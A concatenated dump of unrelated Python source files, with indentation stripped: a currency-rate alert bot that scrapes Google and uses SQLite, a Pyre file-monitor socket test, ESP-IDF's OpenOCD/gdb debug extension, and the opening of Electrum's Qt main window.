'B2%D0%B5%D0%B9%D1%86%D0%B0%D1%80%D1%81%D0%BA%D0%BE%D0%B3%D0%BE+%D1%84%D1%80%D0%B0%D0%BD%D0%BA%'
'D0%B0+%D0%BA+%D1%80%D1%83%D0%B1%D0%BB%D1%8E&oq=%D0%BA%D1%83%D1%80%D1%81+%D1%88%D0%B2%D0%B5%D0%'
'B9%D1%86%D0%B0&gs_lcp=CgZwc3ktYWIQARgBMg0IABCxAxCDARBGEIICMgIIADICCAAyAggAMgIIADICCAAyAggAMgII'
'ADICCAAyAggAOgcIABCwAxBDOggIABCxAxCDAToFCAAQsQM6CggAELEDEIMBEEM6BAgAEEM6DwgAELEDEIMBEEMQRhCCA'
'lCkngNYg9QDYMLmA2gDcAB4AIABUIgBwQWSAQIxMZgBAKABAaoBB2d3cy13aXqwAQDAAQE&sclient=psy-ab',
'BTC': 'https://www.google.com/search?ei=NcIqX8q4FIqwrgSz3K6ACg&q=bitcoin+to+rub&oq=bitcoin+to+&gs_lcp='
'CgZwc3ktYWIQARgBMg0IABCxAxCDARBGEIICMgIIADICCAAyAggAMgIIADICCAAyAggAMgIIADICCAAyAggAOggIABCxAxCD'
'AToFCAAQsQM6AgguOgUILhCxAzoJCAAQsQMQChABOgoIABCxAxCDARBDOgQIABBDOgcIABCxAxBDOgwIABCxAxBDEEYQggI6'
'CQgAEEMQRhCCAlCXLFiEggFguY8BaANwAHgAgAF9iAGgCJIBBDExLjKYAQCgAQGqAQdnd3Mtd2l6sAEAwAEB&sclient=psy-ab'
}
self.headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/83.0.4103.106 Safari/537.36'
}
self.upd_time = upd_time
self.users_to_send = {}
self.flag_upd_uts = False
def parse_html(self, key=None):
# Функция парсинга страницы
full_page = requests.get(self.currencies_ref_dict[key], headers=self.headers)
soup = BeautifulSoup(full_page.content, 'html.parser')
convert = soup.find_all('span', {'class': 'DFlfde SwHCTb', 'data-precision': 2})
return str(convert[0])
def get_rate(self, key=None):
# Функция, приводящая значения валют к общему виду
found_rate = re.findall(r'\d{,9}[.]\d{,5}', self.parse_html(key))
return round(float(found_rate[0]), 2)
@staticmethod
def set_level(user_id, name, chat_id, key, level):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
cursor.execute('INSERT INTO currencies_levels VALUES (?, ?, ?, ?, ?)', (user_id, name, chat_id, key, level))
conn.commit()
def get_id_to_send(self, key):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
db_exists = int(cursor.execute("""SELECT COUNT(name)
FROM sqlite_master
WHERE type = 'table'
AND name = 'currencies_levels'""").fetchone()[0])
if not db_exists:
cursor.execute("""CREATE TABLE currencies_levels(user_id INTEGER(20),
name VAR_CHAR(20),
chat_id INTEGER(20),
curr_code VAR_CHAR(3),
curr_value DECIMAL(10, 2))""")
cursor.execute("""SELECT user_id, name, chat_id, curr_code,curr_value
FROM currencies_levels
WHERE curr_value >= (SELECT curr_value
FROM updated_currencies
WHERE curr_code = ?)
AND curr_code = ?""", (key, key))
self.users_to_send[key] = list(set([item for item in cursor.fetchall()]))
for item in self.users_to_send[key]:
cursor.execute("""DELETE FROM currencies_levels
WHERE user_id = ? AND curr_code = ? AND curr_value = ?""", (item[0], key, item[4]))
conn.commit()
def get_flw_cur(self, id):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
cursor.execute('SELECT * FROM currencies_levels WHERE user_id = ?', (id,))
return cursor.fetchall()
def thread(self):
conn = sqlite3.connect("currencies_db.db")
cursor = conn.cursor()
start_time = time.time() - self.upd_time
while True:
if (time.time() - start_time) < self.upd_time:
continue
else:
start_time = time.time()
db_exists = int(cursor.execute("""SELECT COUNT(name)
FROM sqlite_master
WHERE type = 'table'
AND name = 'updated_currencies'""").fetchone()[0])
if db_exists:
for key in self.currencies_ref_dict:
cursor.execute('UPDATE updated_currencies SET curr_value = ?, '
'time = ? WHERE curr_code = ?',
(self.get_rate(key), time.time(), key))
conn.commit()
else:
cursor.execute("""CREATE TABLE updated_currencies(curr_code VAR_CHAR(3),
curr_value DECIMAL(10, 2),
time INT(30)
)""")
for key in self.currencies_ref_dict.keys():
cursor.execute('INSERT INTO updated_currencies VALUES (?, ?, ?)',
(key, self.get_rate(key), time.time()))
conn.commit()
for key in self.currencies_ref_dict.keys():
self.get_id_to_send(key)
self.flag_upd_uts = True
# logging.warning('Курсы валют обновлены')
def execute(self):
threading.Thread(target=self.thread).start()
|
project_files_monitor_test.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-unsafe
import os
import socket
import tempfile
import threading
import unittest
from unittest.mock import MagicMock, patch
from .. import json_rpc, project_files_monitor
from ..analysis_directory import UpdatedPaths
from ..json_rpc import Request, read_lsp_request
from ..project_files_monitor import MonitorException, ProjectFilesMonitor
from ..socket_connection import SocketConnection, SocketException
from ..tests.mocks import mock_configuration
class MonitorTest(unittest.TestCase):
@patch.object(SocketConnection, "connect")
@patch.object(json_rpc, "perform_handshake")
@patch.object(project_files_monitor, "find_parent_directory_containing_file")
def test_subscriptions(
self,
find_parent_directory_containing_file,
perform_handshake,
_socket_connection,
) -> None:
find_parent_directory_containing_file.return_value = "/ROOT"
configuration = mock_configuration()
analysis_directory = MagicMock()
analysis_directory.get_root.return_value = "/ROOT"
# no additional extensions
configuration.extensions = []
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["match", "TARGETS"],
],
)
# additional extensions
configuration.get_valid_extension_suffixes = lambda: [".thrift", ".whl"]
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
self.assertEqual(len(monitor._subscriptions), 1)
subscription = monitor._subscriptions[0]
self.assertEqual(subscription.root, "/ROOT")
self.assertEqual(subscription.name, "pyre_file_change_subscription")
self.assertEqual(subscription.subscription["fields"], ["name"])
self.assertEqual(
subscription.subscription["expression"][0:2], ["allof", ["type", "f"]]
)
self.assertCountEqual(
subscription.subscription["expression"][2],
[
"anyof",
["suffix", "py"],
["suffix", "pyi"],
["suffix", "thrift"],
["suffix", "whl"],
["match", "TARGETS"],
],
)
# no watchman root -> terminate
find_parent_directory_containing_file.return_value = None
self.assertRaises(
MonitorException,
ProjectFilesMonitor,
configuration,
".",
analysis_directory,
)
def test_bad_socket(self) -> None:
with tempfile.TemporaryDirectory() as root:
bad_socket_path = os.path.join(root, "bad.sock")
socket_connection = SocketConnection(bad_socket_path)
self.assertRaises(SocketException, socket_connection.connect)
@patch.object(ProjectFilesMonitor, "_find_watchman_path")
def test_socket_communication(self, _find_watchman_path) -> None:
# Create a "server" thread to complete the handshake
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
errors = []
with tempfile.TemporaryDirectory() as root:
socket_path = os.path.join(root, ".pyre", "server", "json_server.sock")
os.makedirs(os.path.dirname(socket_path))
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
outfile = connection.makefile(mode="wb")
infile = connection.makefile(mode="rb")
request = Request(
method="handshake/server",
parameters=json_rpc.ByNameParameters({"version": "123"}),
)
json_rpc.write_lsp_request(outfile, request)
response = read_lsp_request(infile)
if response.method != "handshake/client":
errors.append("Client handshake malformed")
return
request = Request(method="handshake/socket_added")
json_rpc.write_lsp_request(outfile, request)
updated_message = read_lsp_request(infile)
if (
updated_message.method != "updateFiles"
or not updated_message.parameters
or updated_message.parameters.get("files")
!= ["/ANALYSIS/a.py", "/ANALYSIS/subdir/b.py"]
):
errors.append("Update message malformed")
server_thread = threading.Thread(target=server)
server_thread.start()
configuration = mock_configuration(version_hash="123")
configuration.log_directory = root + "/.pyre"
configuration.extensions = []
analysis_directory = MagicMock()
analysis_directory.process_updated_files.side_effect = (
lambda files: UpdatedPaths(
updated_paths=[file.replace("ROOT", "ANALYSIS") for file in files],
deleted_paths=[],
)
)
# only create the monitor once the socket is open
with socket_created_lock:
monitor = ProjectFilesMonitor(configuration, ".", analysis_directory)
monitor._handle_response(
{"root": "/ROOT", "files": ["a.py", "subdir/b.py"]}
)
analysis_directory.process_updated_files.assert_called_once_with(
["/ROOT/a.py", "/ROOT/subdir/b.py"]
)
server_thread.join()
self.assertEqual(errors, [])
@patch.object(os.path, "realpath")
def test_socket_connection(self, realpath) -> None:
server_socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
with tempfile.TemporaryDirectory() as root:
realpath.side_effect = lambda path: path.replace(
os.path.dirname(path), root # replace parent directories with tempdir
)
# Unix sockets have a limited length of ~100 characters, so the server uses
# symbolic links as a workaround. We need to properly translate these.
socket_link = os.path.join(
".pyre", "long_name" * 15, "server", "json_server.sock"
)
socket_path = os.path.join(root, "json_server.sock")
socket_created_lock = threading.Lock()
socket_created_lock.acquire() # hold lock until server creates socket
def server():
server_socket.bind(socket_path)
server_socket.listen(1)
socket_created_lock.release()
connection, _ = server_socket.accept()
server_thread = threading.Thread(target=server)
server_thread.start()
with socket_created_lock:
SocketConnection(socket_link).connect()
server_thread.join()
|
debug_ext.py
|
import json
import os
import re
import shlex
import subprocess
import sys
import threading
import time
from threading import Thread
from typing import Any, Dict, List
from idf_py_actions.errors import FatalError
from idf_py_actions.tools import ensure_build_directory
PYTHON = sys.executable
def action_extensions(base_actions, project_path):
OPENOCD_OUT_FILE = 'openocd_out.txt'
GDBGUI_OUT_FILE = 'gdbgui_out.txt'
# Internal dictionary of currently active processes, threads and their output files
processes = {'threads_to_join': [], 'openocd_issues': None}
def _check_for_common_openocd_issues(file_name, print_all=True):
if processes['openocd_issues'] is not None:
return processes['openocd_issues']
try:
message = 'Please check JTAG connection!'
with open(file_name, 'r') as f:
content = f.read()
if print_all:
print(content)
if re.search(r'Address already in use', content):
message = ('Please check if another process uses the mentioned ports. OpenOCD already running, perhaps in the background?\n'
'Please list all processes to check if OpenOCD is already running; if so, terminate it before starting OpenOCD from idf.py')
finally:
processes['openocd_issues'] = message
return message
def _check_openocd_errors(fail_if_openocd_failed, target, ctx):
if fail_if_openocd_failed:
if 'openocd' in processes and processes['openocd'] is not None:
p = processes['openocd']
name = processes['openocd_outfile_name']
# watch OpenOCD (for 5x500ms) to check if it hasn't terminated or outputs an error
for _ in range(5):
if p.poll() is not None:
print('OpenOCD exited with {}'.format(p.poll()))
break
with open(name, 'r') as f:
content = f.read()
if re.search(r'no device found', content):
break
if re.search(r'Listening on port \d+ for gdb connections', content):
# expect OpenOCD has started successfully - stop watching
return
time.sleep(0.5)
else:
return
# OpenOCD exited or error message detected -> print possible output and terminate
raise FatalError('Action "{}" failed due to errors in OpenOCD:\n{}'.format(target, _check_for_common_openocd_issues(name)), ctx)
def _terminate_async_target(target):
if target in processes and processes[target] is not None:
try:
if target + '_outfile' in processes:
processes[target + '_outfile'].close()
p = processes[target]
if p.poll() is None:
p.terminate()
# waiting 10x100ms for the process to terminate gracefully
for _ in range(10):
if p.poll() is not None:
break
time.sleep(0.1)
else:
p.kill()
if target + '_outfile_name' in processes:
if target == 'openocd':
print(_check_for_common_openocd_issues(processes[target + '_outfile_name'], print_all=False))
os.unlink(processes[target + '_outfile_name'])
except Exception as e:
print(e)
print('Failed to close/kill {}'.format(target))
processes[target] = None # to indicate this has ended
def create_local_gdbinit(gdbinit, elf_file):
with open(gdbinit, 'w') as f:
if os.name == 'nt':
elf_file = elf_file.replace('\\','\\\\')
f.write('file {}\n'.format(elf_file))
f.write('target remote :3333\n')
f.write('mon reset halt\n')
f.write('flushregs\n')
f.write('thb app_main\n')
f.write('c\n')
def debug_cleanup():
print('cleaning up debug targets')
for t in processes['threads_to_join']:
if threading.currentThread() != t:
t.join()
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
_terminate_async_target('gdb')
def post_debug(action, ctx, args, **kwargs):
""" Deal with asynchronous targets, such as openocd running in background """
if kwargs['block'] == 1:
for target in ['openocd', 'gdbgui']:
if target in processes and processes[target] is not None:
break
else:
return
try:
p = processes[target]
name = processes[target + '_outfile_name']
pos = 0
while True:
with open(name, 'r') as f:
f.seek(pos)
for line in f:
print(line.rstrip())
pos = f.tell()
if p.poll() is not None:
print('"{}" exited with {}'.format(target, p.poll()))
break
time.sleep(0.5)
except KeyboardInterrupt:
print('Terminated -> exiting debug utility targets')
_terminate_async_target('openocd')
_terminate_async_target('gdbgui')
def get_project_desc(args, ctx):
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
return project_desc
def openocd(action, ctx, args, openocd_scripts, openocd_commands):
"""
Execute openocd as external tool
"""
OPENOCD_TAGET_CONFIG = {
'esp32': '-f board/esp32-wrover-kit-3.3v.cfg',
'esp32s2': '-f board/esp32s2-kaluga-1.cfg',
}
if os.getenv('OPENOCD_SCRIPTS') is None:
raise FatalError('OPENOCD_SCRIPTS not found in the environment: Please run export.sh/export.bat', ctx)
openocd_arguments = os.getenv('OPENOCD_COMMANDS') if openocd_commands is None else openocd_commands
project_desc = get_project_desc(args, ctx)
if openocd_arguments is None:
# use default value if commands not defined in the environment nor command line
target = project_desc['target']
default_args = '-f interface/ftdi/esp32_devkitj_v1.cfg -f target/{}.cfg'.format(target)
openocd_arguments = OPENOCD_TAGET_CONFIG.get(target, default_args)
print('Note: OpenOCD cfg not found (via env variable OPENOCD_COMMANDS nor as a --openocd-commands argument)\n'
'OpenOCD arguments default to: "{}"'.format(openocd_arguments))
# script directory is taken from the environment by OpenOCD, update only if command line arguments to override
if openocd_scripts is not None:
openocd_arguments += ' -s {}'.format(openocd_scripts)
local_dir = project_desc['build_dir']
args = ['openocd'] + shlex.split(openocd_arguments)
openocd_out_name = os.path.join(local_dir, OPENOCD_OUT_FILE)
openocd_out = open(openocd_out_name, 'a+')
try:
process = subprocess.Popen(args, stdout=openocd_out, stderr=subprocess.STDOUT, bufsize=1)
except Exception as e:
print(e)
raise FatalError('Error starting openocd. Please make sure it is installed and is present in executable paths', ctx)
processes['openocd'] = process
processes['openocd_outfile'] = openocd_out
processes['openocd_outfile_name'] = openocd_out_name
print('OpenOCD started as a background task {}'.format(process.pid))
def get_gdb_args(gdbinit, project_desc: Dict[str, Any]) -> List[str]:
args = ['-x={}'.format(gdbinit)]
debug_prefix_gdbinit = project_desc.get('debug_prefix_map_gdbinit')
if debug_prefix_gdbinit:
args.append('-ix={}'.format(debug_prefix_gdbinit))
return args
def gdbui(action, ctx, args, gdbgui_port, gdbinit, require_openocd):
"""
Asynchronous GDB-UI target
"""
project_desc = get_project_desc(args, ctx)
local_dir = project_desc['build_dir']
gdb = project_desc['monitor_toolprefix'] + 'gdb'
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, os.path.join(args.build_dir, project_desc['app_elf']))
# this is a workaround for gdbgui
# gdbgui is using shlex.split for the --gdb-args option. When the input is:
# - '"-x=foo -x=bar"', would return ['foo bar']
# - '-x=foo', would return ['-x', 'foo'] and mess up the former option '--gdb-args'
# so for one item, use extra double quotes. for more items, use no extra double quotes.
gdb_args = get_gdb_args(gdbinit, project_desc)
gdb_args = '"{}"'.format(' '.join(gdb_args)) if len(gdb_args) == 1 else ' '.join(gdb_args)
args = ['gdbgui', '-g', gdb, '--gdb-args', gdb_args]
print(args)
if gdbgui_port is not None:
args += ['--port', gdbgui_port]
gdbgui_out_name = os.path.join(local_dir, GDBGUI_OUT_FILE)
gdbgui_out = open(gdbgui_out_name, 'a+')
env = os.environ.copy()
# The only known solution for https://github.com/cs01/gdbgui/issues/359 is to set the following environment
# variable. The greenlet package cannot be downgraded for compatibility with other requirements (gdbgui,
# pygdbmi).
env['PURE_PYTHON'] = '1'
try:
process = subprocess.Popen(args, stdout=gdbgui_out, stderr=subprocess.STDOUT, bufsize=1, env=env)
except Exception as e:
print(e)
raise FatalError('Error starting gdbgui. Please make sure gdbgui has been installed with '
'"install.{sh,bat,ps1,fish} --enable-gdbgui" and can be started.', ctx)
processes['gdbgui'] = process
processes['gdbgui_outfile'] = gdbgui_out
processes['gdbgui_outfile_name'] = gdbgui_out_name
print('gdbgui started as a background task {}'.format(process.pid))
_check_openocd_errors(fail_if_openocd_failed, action, ctx)
def global_callback(ctx, global_args, tasks):
def move_to_front(task_name):
for index, task in enumerate(tasks):
if task.name == task_name:
tasks.insert(0, tasks.pop(index))
break
debug_targets = any([task.name in ('openocd', 'gdbgui') for task in tasks])
if debug_targets:
# Register the meta cleanup callback -> called on FatalError
ctx.meta['cleanup'] = debug_cleanup
move_to_front('gdbgui') # possibly 2nd
move_to_front('openocd') # always 1st
# followed by "monitor", "gdb" or "gdbtui" in any order
post_action = ctx.invoke(ctx.command.get_command(ctx, 'post_debug'))
if any([task.name in ('monitor', 'gdb', 'gdbtui') for task in tasks]):
post_action.action_args['block'] = 0
else:
post_action.action_args['block'] = 1
tasks.append(post_action) # always last
if any([task.name == 'openocd' for task in tasks]):
for task in tasks:
if task.name in ('gdb', 'gdbgui', 'gdbtui'):
task.action_args['require_openocd'] = True
def run_gdb(gdb_args):
p = subprocess.Popen(gdb_args)
processes['gdb'] = p
return p.wait()
def gdbtui(action, ctx, args, gdbinit, require_openocd):
"""
Synchronous GDB target with text ui mode
"""
gdb(action, ctx, args, 1, gdbinit, require_openocd)
def gdb(action, ctx, args, gdb_tui, gdbinit, require_openocd):
"""
Synchronous GDB target
"""
watch_openocd = Thread(target=_check_openocd_errors, args=(fail_if_openocd_failed, action, ctx, ))
watch_openocd.start()
processes['threads_to_join'].append(watch_openocd)
desc_path = os.path.join(args.build_dir, 'project_description.json')
if not os.path.exists(desc_path):
ensure_build_directory(args, ctx.info_name)
with open(desc_path, 'r') as f:
project_desc = json.load(f)
elf_file = os.path.join(args.build_dir, project_desc['app_elf'])
if not os.path.exists(elf_file):
raise FatalError('ELF file not found. You need to build & flash the project before running debug targets', ctx)
gdb = project_desc['monitor_toolprefix'] + 'gdb'
local_dir = project_desc['build_dir']
if gdbinit is None:
gdbinit = os.path.join(local_dir, 'gdbinit')
create_local_gdbinit(gdbinit, elf_file)
args = [gdb, *get_gdb_args(gdbinit, project_desc)]
if gdb_tui is not None:
args += ['-tui']
t = Thread(target=run_gdb, args=(args,))
t.start()
while True:
try:
t.join()
break
except KeyboardInterrupt:
# Catching Keyboard interrupt, as this is used for breaking running program in gdb
continue
finally:
watch_openocd.join()
try:
processes['threads_to_join'].remove(watch_openocd)
except ValueError:
# Valid scenario: watch_openocd task won't be in the list if openocd not started from idf.py
pass
fail_if_openocd_failed = {
'names': ['--require-openocd', '--require_openocd'],
'help':
('Fail this target if openocd (this targets dependency) failed.\n'),
'is_flag': True,
'default': False,
}
gdbinit = {
'names': ['--gdbinit'],
'help': ('Specify the name of gdbinit file to use\n'),
'default': None,
}
debug_actions = {
'global_action_callbacks': [global_callback],
'actions': {
'openocd': {
'callback': openocd,
'help': 'Run openocd from current path',
'options': [
{
'names': ['--openocd-scripts', '--openocd_scripts'],
'help':
('Script directory for openocd cfg files.\n'),
'default':
None,
},
{
'names': ['--openocd-commands', '--openocd_commands'],
'help':
('Command line arguments for openocd.\n'),
'default': None,
}
],
'order_dependencies': ['all', 'flash'],
},
'gdb': {
'callback': gdb,
'help': 'Run the GDB.',
'options': [
{
'names': ['--gdb-tui', '--gdb_tui'],
'help':
('run gdb in TUI mode\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbgui': {
'callback': gdbui,
'help': 'GDB UI in default browser.',
'options': [
{
'names': ['--gdbgui-port', '--gdbgui_port'],
'help':
('The port on which gdbgui will be hosted. Default: 5000\n'),
'default':
None,
}, gdbinit, fail_if_openocd_failed
],
'order_dependencies': ['all', 'flash'],
},
'gdbtui': {
'callback': gdbtui,
'help': 'GDB TUI mode.',
'options': [gdbinit, fail_if_openocd_failed],
'order_dependencies': ['all', 'flash'],
},
'post-debug': {
'callback': post_debug,
'help': 'Utility target to read the output of async debug action and stop them.',
'options': [
{
'names': ['--block', '--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
'post_debug': {
'callback': post_debug,
'deprecated': {
'removed': 'v5.0',
'message': 'Please use "post-debug" instead.',
},
'hidden': True,
'help': 'Utility target to read the output of async debug action and stop them.',
'options': [
{
'names': ['--block', '--block'],
'help':
('Set to 1 for blocking the console on the outputs of async debug actions\n'),
'default': 0,
},
],
'order_dependencies': [],
},
},
}
return debug_actions
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed, UntrustedServerReturnedError
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
